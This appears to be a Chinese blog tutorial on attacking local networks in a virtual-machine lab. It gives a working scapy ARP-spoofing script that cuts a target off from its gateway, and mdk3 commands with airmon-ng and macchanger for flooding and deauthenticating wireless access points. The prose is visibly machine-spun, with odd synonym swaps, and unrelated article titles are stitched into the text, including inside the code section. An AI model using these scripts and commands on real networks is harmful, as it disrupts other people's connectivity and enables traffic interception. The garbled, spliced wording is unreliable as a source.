局部网络屏障

局部网络屏障

无线AP与无线网桥的带机量是多少?一篇文章了解清楚

有线网络屏障

ARP官方释意:地址剖析协议,即ARP(Address Resolution Protocol),是凭据获取的一个。发送信息时将包罗目的IP地址的ARP请求广播到局域网络上的所有主机,并吸收返回新闻,以此确定目的的物理地址(mac);收到返回新闻后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。

局部网络屏障

 

实验环境:

linux parrot(攻击系统)

Linux centos(被攻击系统)

实验语言:Python

 

Arp协议是网络不能缺少的一部分,由于arp协议存在一些不能修复的破绽以是骇客也经常行使这个破绽举行局域网攻击。攻击大致分为两种。(1)纯粹的网络攻击,迫使受害者无法使用网络 (2)目的性攻击,arp诱骗获取局域网使用者的信息,偷取账号密码等敏感信息。

笔者的电脑是接入卧室网络的,本来想使用真实电脑作为攻击目的,鉴于室友正在使用,转移到虚拟机举行实验。

搭建实验环境

局部网络屏障

 

Linux parrot(攻击系统)

局部网络屏障

 

Linux centos(被攻击系统)

我们可以看到终端显示的信息(网关一样平常是默认的)

 

攻击系统IP :192.168.163.146 MAC:00:0c:29:41:75:aa

被攻击者IP:192.168.163.150 MAC:00:0c:29:0b:09:89

网络测试依次使用两台机械ping百度显示信息如下

 

局部网络屏障

 

局部网络屏障

 

此信息说明可以毗邻外网,证实现在可以上网

使用攻击系统扫描本网段的信息,使用到的工具fping

局部网络屏障

 

扫描到目的IP使用arp -a下令确认一下信息如下:

局部网络屏障

 

确认无误,我的局域网中网关以2末端,以是我们睁开192.168.163.2和192.

168.163.150之间的攻击。

使用python的scapy模块,编写对应的ARP包举行发送,由于scapy有自力的交互模式,我们就直接在终端中举行编程。注重这里要进入root权限

焦点源代码如下:

>>> a = ARP()

>>> a.show()

###[ ARP ]###

hwtype= 0x1

ptype= IPv4

hwlen= None

plen= None

op= who-has

hwsrc= 00:0c:29:41:75:aa

psrc= 192.168.163.146

hwdst= 00:00:00:00:00:00

pdst= 0.0.0.0

不需要软件,用命令简单实现内外网切换指定网段走哪条线路

 

>>> a.psrc = '192.168.163.2'

>>> a.pdst = '192.168.163.150'

>>> send(a,loop=1)

 

正在攻击目的

局部网络屏障

 

验证:

局部网络屏障

 

Ping百度没有反应,网关mac地址也被修改为攻击机的MAC地址

Python代码:

from scapy.all import *

import time

import random

pdst=str(input("目的IP:"))

gw=str(input("网关IP:"))

a = ARP()

a.pdst = pdst

a.psrc = gw

a.hwsrc = 'b4:1e:89:20:43:A1'

while 1:

send(a,loop =0)

time.sleep(random.uniform(10,5))

无线网络屏障

无线网络攻击相对上面的操作加倍简朴,纯工具攻击方案。首先需要一个攻击系统,我选用parrot security系统,由于这个系统整合的工具对照全,现对于kali来说虽然没有什么较大的优势然则他的UI界面做的相当的好。

插入无线网卡

局部网络屏障

 

可以看到无线网卡被命名为了wlan0(由于一样平常都是这样命名的),使用airmon-ng将无线网专为mon模式,在这之前最好把网卡mac地址改变一下(我也不知道有什么用总之这样改感受郑重一些):

ifconfig wlan0 down

Macchanger -m MAC wlan0

ifconfg wlan0 up

局部网络屏障

 

局部网络屏障

 

airmon-ng start wlan0

局部网络屏障

 

接下来就可以使用wlan0mon举行无线网的查看了,记着名字已经酿成wlan0mon了

使用airodump-ng wlan0mon或者wifete

局部网络屏障

 

打开就马上扫到这两个wifi,实验目的是ruijie(传说中的我打我自己,吐槽一下锐捷客户端,不能开wifi就算了连虚拟机都不能用,让计算机专业的学生怎么搭建环境,虽然我不是计算机专业)。

直接最先攻击 mdk3 wlan0mon a -i MAC -s 速率

局部网络屏障

 

从毗邻状态可以看出来有大量的mac地址请求确立毗邻,固然我的手机已经没网了,也许就是0-20秒网络变的卡顿,之后完全失去网络通讯,固然这只是一个AP的攻击想要实现一定局限的网络中止实在也就是一个下令的事。mdk3 wlan0mon d -w 白名单AP的mac -b黑名单AP的mac -c 信道。回车键敲下去结果可想而知,网卡可能会坏掉 哈哈…

这两种攻击方式有点不一样,第一个是洪水攻击行使大量的伪造mac迫使AP无法正常提供服务,第二种是直接举行排除认证。

Aircrack-ng套装是专门针对无线的一套工具,mdk3是专用的攻击工具,除了上面的案例另有许多可研究的使用方式。

总结:

两种对照常见的局域网攻击手段,单个拿出来看似确实没什么,然则两个组合在一起完全可以制造一个网络屏障空间,对目的造成一定的危害,虽然是局域网,但也请不要随意对他人使用,详细的防御方式在其他的文章中也有讲述,ARP攻防那篇文章有讲到若何预防ARP攻击,无线攻击预防方案只能在路由中举行设置,有些到现在为止都还没找到合适的防御方案。

华为交换机MSTP+VRRP典型场景实验

分享到 :
相关推荐

发表评论

登录... 后才能评论